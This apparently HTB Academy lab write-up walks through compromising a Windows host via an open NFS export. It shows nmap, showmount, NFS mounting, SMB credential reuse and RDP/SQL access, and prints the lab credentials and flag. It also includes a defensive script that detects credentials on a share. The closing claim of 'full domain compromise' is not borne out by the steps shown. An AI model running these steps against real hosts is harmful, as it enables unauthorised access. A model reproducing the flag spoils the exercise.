# User Compromise via Open NFS

## Description

A server exists that everyone on the internal network has access to. Our customer agreed to this and added this server to our scope. We need to find out as much information as possible about this server and find ways to use it against the server itself. For the proof and protection of customer data, a user named `HTB` has been created. Accordingly, we need to obtain the credentials of this user as proof.

## Objective

* Footprinting

## Flag

* Compromised User Account
  * HTB
  * `lnch7ehrdn43i7AoqVPK4zWR`

## Solution

During the internal network assessment, the target machine at IP address `10.129.202.41` was identified as accessible to all users. The objective of this assessment was to retrieve the credentials of a user account named `HTB`, which had been created on the system for that purpose.

#### Enumeration

An initial full-port Nmap scan was conducted using the following command:

```bash
nmap -p- -T5 -sCV 10.129.202.41
```

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ nmap -p- -T5 -sCV 10.129.202.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 00:29 CST
Warning: 10.129.202.41 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.129.202.41
Host is up (0.21s latency).
Not shown: 65273 closed tcp ports (reset), 246 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|_  100005  1,2,3       2049/udp6  mountd
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
2049/tcp  open  mountd        1-3 (RPC #100005)
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=WINMEDIUM
| Not valid before: 2025-02-27T06:27:22
|_Not valid after:  2025-08-29T06:27:22
| rdp-ntlm-info: 
|   Target_Name: WINMEDIUM
|   NetBIOS_Domain_Name: WINMEDIUM
|   NetBIOS_Computer_Name: WINMEDIUM
|   DNS_Domain_Name: WINMEDIUM
|   DNS_Computer_Name: WINMEDIUM
|   Product_Version: 10.0.17763
|_  System_Time: 2025-02-28T06:33:22+00:00
|_ssl-date: 2025-02-28T06:33:31+00:00; +56s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49679/tcp open  msrpc         Microsoft Windows RPC
49680/tcp open  msrpc         Microsoft Windows RPC
49681/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-28T06:33:27
|_  start_date: N/A
|_clock-skew: mean: 55s, deviation: 0s, median: 55s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 223.16 seconds
```

The scan revealed several open ports, most notably:

* **111/tcp** – `rpcbind`, indicating potential NFS services.
* **2049/tcp** – `nfs/mountd`, confirming the presence of NFS.
* **445/tcp** – SMB, standard Windows file sharing.
* **3389/tcp** – Remote Desktop Protocol (RDP).
* Various high-numbered ports associated with MSRPC.

Additionally, the system was identified as a Windows machine (`Product_Version: 10.0.17763`) with the hostname `WINMEDIUM`.

#### NFS Share Discovery

Using `showmount`, the server's NFS export list was queried:

```bash
showmount -e 10.129.202.41
```

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ showmount -e 10.129.202.41
Export list for 10.129.202.41:
/TechSupport (everyone)
```

This revealed a world-accessible export:

```bash
/TechSupport (everyone)
```

#### Exploitation: Mounting the NFS Share

The `/TechSupport` share was mounted locally:

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ mkdir NFS
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ sudo mount -t nfs 10.129.202.41:/TechSupport ./NFS -o nolock
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ sudo ls NFS/
ticket4238791283649.txt  ticket4238791283700.txt  ticket4238791283751.txt
ticket4238791283650.txt  ticket4238791283701.txt  ticket4238791283752.txt
ticket4238791283651.txt  ticket4238791283702.txt  ticket4238791283753.txt
ticket4238791283652.txt  ticket4238791283703.txt  ticket4238791283754.txt
ticket4238791283653.txt  ticket4238791283704.txt  ticket4238791283755.txt
ticket4238791283654.txt  ticket4238791283705.txt  ticket4238791283756.txt
ticket4238791283655.txt  ticket4238791283706.txt  ticket4238791283757.txt
ticket4238791283656.txt  ticket4238791283707.txt  ticket4238791283758.txt
ticket4238791283657.txt  ticket4238791283708.txt  ticket4238791283759.txt
ticket4238791283658.txt  ticket4238791283709.txt  ticket4238791283760.txt
ticket4238791283659.txt  ticket4238791283710.txt  ticket4238791283761.txt
ticket4238791283660.txt  ticket4238791283711.txt  ticket4238791283762.txt
ticket4238791283661.txt  ticket4238791283712.txt  ticket4238791283763.txt
ticket4238791283662.txt  ticket4238791283713.txt  ticket4238791283764.txt
ticket4238791283663.txt  ticket4238791283714.txt  ticket4238791283765.txt
ticket4238791283664.txt  ticket4238791283715.txt  ticket4238791283766.txt
ticket4238791283665.txt  ticket4238791283716.txt  ticket4238791283767.txt
ticket4238791283666.txt  ticket4238791283717.txt  ticket4238791283768.txt
ticket4238791283667.txt  ticket4238791283718.txt  ticket4238791283769.txt
ticket4238791283668.txt  ticket4238791283719.txt  ticket4238791283770.txt
ticket4238791283669.txt  ticket4238791283720.txt  ticket4238791283771.txt
ticket4238791283670.txt  ticket4238791283721.txt  ticket4238791283772.txt
ticket4238791283671.txt  ticket4238791283722.txt  ticket4238791283773.txt
ticket4238791283672.txt  ticket4238791283723.txt  ticket4238791283774.txt
ticket4238791283673.txt  ticket4238791283724.txt  ticket4238791283775.txt
ticket4238791283674.txt  ticket4238791283725.txt  ticket4238791283776.txt
ticket4238791283675.txt  ticket4238791283726.txt  ticket4238791283777.txt
ticket4238791283676.txt  ticket4238791283727.txt  ticket4238791283778.txt
ticket4238791283677.txt  ticket4238791283728.txt  ticket4238791283779.txt
ticket4238791283678.txt  ticket4238791283729.txt  ticket4238791283780.txt
ticket4238791283679.txt  ticket4238791283730.txt  ticket4238791283781.txt
ticket4238791283680.txt  ticket4238791283731.txt  ticket4238791283782.txt
ticket4238791283681.txt  ticket4238791283732.txt  ticket4238791283783.txt
ticket4238791283682.txt  ticket4238791283733.txt  ticket4238791283784.txt
ticket4238791283683.txt  ticket4238791283734.txt  ticket4238791283785.txt
ticket4238791283684.txt  ticket4238791283735.txt  ticket4238791283786.txt
ticket4238791283685.txt  ticket4238791283736.txt  ticket4238791283787.txt
ticket4238791283686.txt  ticket4238791283737.txt  ticket4238791283788.txt
ticket4238791283687.txt  ticket4238791283738.txt  ticket4238791283789.txt
ticket4238791283688.txt  ticket4238791283739.txt  ticket4238791283790.txt
ticket4238791283689.txt  ticket4238791283740.txt  ticket4238791283791.txt
ticket4238791283690.txt  ticket4238791283741.txt  ticket4238791283792.txt
ticket4238791283691.txt  ticket4238791283742.txt  ticket4238791283793.txt
ticket4238791283692.txt  ticket4238791283743.txt  ticket4238791283794.txt
ticket4238791283693.txt  ticket4238791283744.txt  ticket4238791283795.txt
ticket4238791283694.txt  ticket4238791283745.txt  ticket4238791283796.txt
ticket4238791283695.txt  ticket4238791283746.txt  ticket4238791283797.txt
ticket4238791283696.txt  ticket4238791283747.txt  ticket4238791283798.txt
ticket4238791283697.txt  ticket4238791283748.txt  ticket4238791283799.txt
ticket4238791283698.txt  ticket4238791283749.txt  ticket4238791283800.txt
ticket4238791283699.txt  ticket4238791283750.txt  ticket4238791283801.txt
```

Once mounted, the share contained a large number of files, all named in a pattern resembling support tickets (e.g., `ticket4238791283649.txt`, `ticket4238791283754.txt`, etc.).

#### Analyzing NFS Share Contents

After mounting the NFS share, its contents were listed with `ls -la`, which showed that almost all of the `.txt` files were empty. One file, `ticket4238791283782.txt` (1305 bytes), contained a support-chat transcript between an operator and a user named **alex**.

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ sudo ls -la NFS/
total 72
drwx------  2 nobody        nogroup       65536 Nov 10  2021 .
drwx------ 26 htb-ac-262779 htb-ac-262779  4096 Feb 28 00:38 ..
<snip>
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283774.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283775.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283776.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283777.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283778.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283779.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283780.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283781.txt
-rwx------  1 nobody        nogroup        1305 Nov 10  2021 ticket4238791283782.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283783.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283784.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283785.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283786.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283787.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283788.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283789.txt
-rwx------  1 nobody        nogroup           0 Nov 10  2021 ticket4238791283790.txt
<snip>
```

Contents of `ticket4238791283782.txt`:

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ sudo cat NFS/ticket4238791283782.txt
Conversation with InlaneFreight Ltd

Started on November 10, 2021 at 01:27 PM London time GMT (GMT+0200)
---
01:27 PM | Operator: Hello,. 
 
So what brings you here today?
01:27 PM | alex: hello
01:27 PM | Operator: Hey alex!
01:27 PM | Operator: What do you need help with?
01:36 PM | alex: I run into an issue with the web config file on the system for the smtp server. do you mind to take a look at the config?
01:38 PM | Operator: Of course
01:42 PM | alex: here it is:

smtp {
    host=smtp.web.dev.inlanefreight.htb
    #port=25
    ssl=true
    user="alex"
    password="lol123!mD"
    from="alex.g@web.dev.inlanefreight.htb"
}

securesocial {
    
    onLoginGoTo=/
    onLogoutGoTo=/login
    ssl=false
    
    userpass {      
    	withUserNameSupport=false
    	sendWelcomeEmail=true
    	enableGravatarSupport=true
    	signupSkipLogin=true
    	tokenDuration=60
    	tokenDeleteInterval=5
    	minimumPasswordLength=8
    	enableTokenJob=true
    	hasher=bcrypt
	}

     cookie {
     #       name=id
     #       path=/login
     #       domain="10.129.2.59:9500"
            httpOnly=true
            makeTransient=false
            absoluteTimeoutInMinutes=1440
            idleTimeoutInMinutes=1440
    }   



---
```

Key Findings from the NFS Share:

* **File:** `ticket4238791283782.txt`
* **Contents:** A conversation revealing SMTP server credentials:

  ```
  user="alex"
  password="lol123!mD"
  ```
* **Additional Notes:**
  * The conversation also included a web configuration snippet, possibly from an internal SMTP service.
  * The credentials suggested potential access to other services.
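The triage above (150 ticket files, almost all empty, one holding a pasted config with a password) is exactly the kind of check that should be automated when auditing a world-readable export. The following Python script is an added example, not part of the original writeup: it walks a mounted share, skips empty files, flags lines that look like credential assignments (the HOCON-style `password="..."` form seen in the ticket), and masks the values so the report itself does not leak them. The directory layout and file contents it builds are constructed for the demonstration; the regex is a heuristic, not an exhaustive secret detector.

```python
"""Added example (not from the writeup): audit a mounted share for credential-like
strings, skipping empty files and masking values in the report. Paths and sample
contents are constructed."""
import re
import tempfile
from pathlib import Path

# key=value / key="value" / key: value, as in the HOCON-style SMTP block in the
# ticket file (user="alex", password="...").
CRED_RE = re.compile(
    r'^\s*(?P<key>pass(?:word|wd)?|pwd|secret|token|api[_-]?key)'
    r'\s*[=:]\s*"?(?P<value>[^"\s#]+)',
    re.IGNORECASE,
)

def mask(value: str) -> str:
    """Keep two leading characters so the hit is recognisable, hide the rest."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)

def scan_share(root: Path) -> dict:
    """Return {'files': n, 'empty': n, 'findings': [{file, line, key, value}, ...]}."""
    report = {"files": 0, "empty": 0, "findings": []}
    for path in sorted(p for p in root.rglob("*") if p.is_file()):
        report["files"] += 1
        if path.stat().st_size == 0:          # the bulk of the ticket files
            report["empty"] += 1
            continue
        text = path.read_text(encoding="utf-8", errors="replace")
        for lineno, line in enumerate(text.splitlines(), start=1):
            m = CRED_RE.match(line)
            if m:
                report["findings"].append({
                    "file": str(path.relative_to(root)),
                    "line": lineno,
                    "key": m.group("key"),
                    "value": mask(m.group("value")),
                })
    return report

def build_sample_share() -> Path:
    """Constructed stand-in for the export: 99 empty ticket files plus one chat log."""
    root = Path(tempfile.mkdtemp(prefix="nfs-audit-"))
    for n in range(100):
        (root / f"ticket{n:04d}.txt").touch()
    (root / "ticket0042.txt").write_text(
        "01:42 PM | alex: here it is:\nsmtp {\n    host=smtp.example.internal\n"
        "    #port=25\n    user=\"alex\"\n    password=\"s3cr3t-example\"\n}\n"
    )  # constructed credential value, not the one from the ticket
    return root

if __name__ == "__main__":
    rep = scan_share(build_sample_share())
    print(rep["files"], "files,", rep["empty"], "empty, hits:", rep["findings"])
```

Point `scan_share` at the real mount point (e.g. `Path("./NFS")`) to run it against an actual export; only masked values appear in the output.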

#### Credential Reuse & SMB Enumeration

Using the discovered credentials (`alex:lol123!mD`), we attempted to enumerate SMB shares on the target (`10.129.202.41`).

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ smbclient -U "alex" -L //10.129.202.41
Password for [WORKGROUP\alex]:

	Sharename       Type      Comment
	---------       ----      -------
	ADMIN$          Disk      Remote Admin
	C$              Disk      Default share
	devshare        Disk      
	IPC$            IPC       Remote IPC
	Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.202.41 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
```

Inspecting each share in turn, the `devshare` share contained an `important.txt` file.

```bash
┌─[eu-academy-4]─[10.10.15.6]─[htb-ac-262779@htb-5eiq2mmn3o]─[~]
└──╼ [★]$ smbclient -U "alex" //10.129.202.41/devshare
Password for [WORKGROUP\alex]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Nov 10 10:12:22 2021
  ..                                  D        0  Wed Nov 10 10:12:22 2021
  important.txt                       A       16  Wed Nov 10 10:12:55 2021

		10328063 blocks of size 4096. 6097413 blocks available
smb: \> more important.txt 
getting file \important.txt of size 16 as /tmp/smbmore.34uUUf (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
```

Contents of the `important.txt` file:

```
sa:87N1ns@slls83
```

The `sa` username suggested that this password belonged to the **SQL Server administrator (`sa`)** account.

#### Gaining RDP Access & Database Exploitation

Using alex's credentials, an RDP login to the Windows machine succeeded.


The **Microsoft SQL Server Management Studio** was launched as Administrator and connected to the local SQL Server instance.

* Navigated to the `dbo.devsacc` table\
  ![](/files/a77UWyN6Z9D6C49b9JgI)
* Selected **Edit Top 200 Rows**\
  ![](/files/2NrM2UwAKoFeio0AKtpc)

After careful review of the `dbo.devsacc` table, `HTB` credentials were extracted.

* name: `HTB`
* password: `lnch7ehrdn43i7AoqVPK4zWR`

## Conclusion

This assessment demonstrated a multi-stage attack chain that exploited a misconfigured network share and credential reuse:

1. **NFS Share Enumeration** – Discovered sensitive credentials in exposed log files.
2. **SMB Credential Reuse Attack** – Leveraged found credentials to access restricted shares, uncovering an administrative password.
3. **RDP & Database Compromise** – Used stolen credentials for initial access, then extracted additional credentials from the database.

Through systematic enumeration and exploitation, the attack progressed from exposed file shares to full domain compromise.
